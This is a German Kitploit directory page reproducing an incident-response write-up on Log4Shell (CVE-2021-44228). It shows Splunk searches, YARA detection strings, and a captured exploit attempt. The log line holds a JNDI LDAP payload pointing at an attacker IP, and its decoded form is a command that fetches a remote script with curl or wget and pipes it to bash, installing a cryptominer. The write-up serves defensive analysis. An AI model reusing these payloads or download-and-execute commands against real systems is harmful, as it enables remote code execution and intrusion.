Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-44228-DFIR-Notes — CVE-2021-44228 DFIR Notizen | Kitploit
Tools/GitHubGitHub/azeemering/cve-2021-44228-dfir-notes
SchwachstellenanalyseMalware-AnalyseDigitale ForensikBedrohungsanalyseLernen & BildungIncident ResponseLog-Analyse
GitHubazeemering/cve-2021-44228-dfir-notes

CVE-2021-44228-DFIR-Notes

CVE-2021-44228 DFIR Notizen

Repository anzeigen
72vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-44228 DFIR-Notizen

Auf dem Heimweg bekam ich die ersten Nachrichten über die #log4shell-Sicherheitslücke herein.

Eine schwerwiegende Sicherheitslücke (CVE-2021-44228), die mehrere Versionen des Apache Log4j 2-Dienstprogramms betrifft, wurde am 9. Dezember 2021 über das GitHub-Projekt öffentlich bekannt gegeben. Diese von Chen Zhaojun vom Alibaba Cloud Security Team entdeckte Sicherheitslücke betrifft Apache Log4j 2 Versionen 2.0 bis 2.14.1

Habe mich gleich nach meiner Ankunft zu Hause reingestürzt. Splunk4tw wie üblich.

Nachdem der erste Proof-of-Concept-Exploit auf GitHub veröffentlicht wurde, begannen Bedrohungsakteure, das Internet nach Systemen zu durchsuchen, die für diese aus der Ferne ausnutzbare Sicherheitslücke anfällig sind, die keine Authentifizierung erfordert. Was Sie unten sehen, sind Teile dieser Scan- und Exploit-Versuche.

Mein erster Schritt ist zu prüfen, ob jemand eine erste YARA-Regel veröffentlicht hat. Gefunden hier https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b (Thx Florian Roth)

Darin werden folgende Erkennungsstrings erwähnt: strings: $x1 = "${jndi:ldap:/" $x2 = "${jndi:rmi:/" $x3 = "${jndi:ldaps:/" $x4 = "${jndi:dns:/"

Ich habe keine Angst... lasst uns ein paar CPUs quälen und mit der schlimmsten Splunk-Suche direkt aufs Ganze gehen.

index=* jndi:ldap* (aktualisierte Abfrage mit index=* "{lower:l}${lower:d}a${lower:p}")

Ich habe Treffer sowohl in meinen IIS-Protokollen als auch in der Windows-Ereignisprotokollierung (redacted) und viele blockierte Versuche in der Firewall-Protokollierung....

IIS: image

WINEVENTLOG: image

Überprüfung der IP-Adresse 45.155.205.233.....St. Petersburg, Russland.....was für eine Überraschung. image

Der gefundene String sieht aus wie ein klassischer, obfuskierter, codierter bösartiger String aus dem Lehrbuch. Mal sehen, was er tut:

Decodieren wir den Base64-String mit CyberChef. 2021-12-10 13:26:16 [redacted] GET / - 443 - xxx.xx.xxx.xx ${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNDUuMzUuMTk1LjYzOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE0NS4zNS4xOTUuNjM6ODApfGJhc2g=} http://[redacted]:80/ 200 0 0 171

image

(curl -s 45.155.xx.233:xxxx/145.xx.195.63:80||wget -q -O- 45.xx.205.233:xxxx/145.xx.xxx.63:80)|bash

Curl...ein Shell-Skript ausführen, bash....OMG. Ich bekomme eine Ahnung, was dieses fiese Stück Arbeit tun wird....

Führen wir den Curl-Befehl in einer Sandbox aus:

image

368 Zeilen Code. (Hier ausführen, wenn Sie das gesamte Skript sehen möchten --> https://reqbin.com/c-ipejxywd

Einige Ausschnitte:

image image image

Und nachdem es fertig ist, löscht es sogar die Logdateien...was für eine Überraschung:

image

Es versucht im Grunde, eine Malware namens Kingsin zu installieren, ein Crypto-Miner. Zielgeräte sind nix-Systeme. Stellen Sie sicher, dass Sie Ihre Systeme patchen, da der Exploit verwendet wird, um alle Arten von Payloads auszuführen, wahrscheinlich.

Danke an meine Kollegen Martijn von Umbrio und Rob [redacted] für einen Freitagabend voller WhatsApp-Gefechte zu diesem Thema. 00:09 Zeit fürs Bett.

#UPDATES & gute Ressourcen#

  • https://www.splunk.com/en_us/blog/security/log-jammin-log4j-2-rce.html
  • https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/
  • https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228

image

Tool herunterladen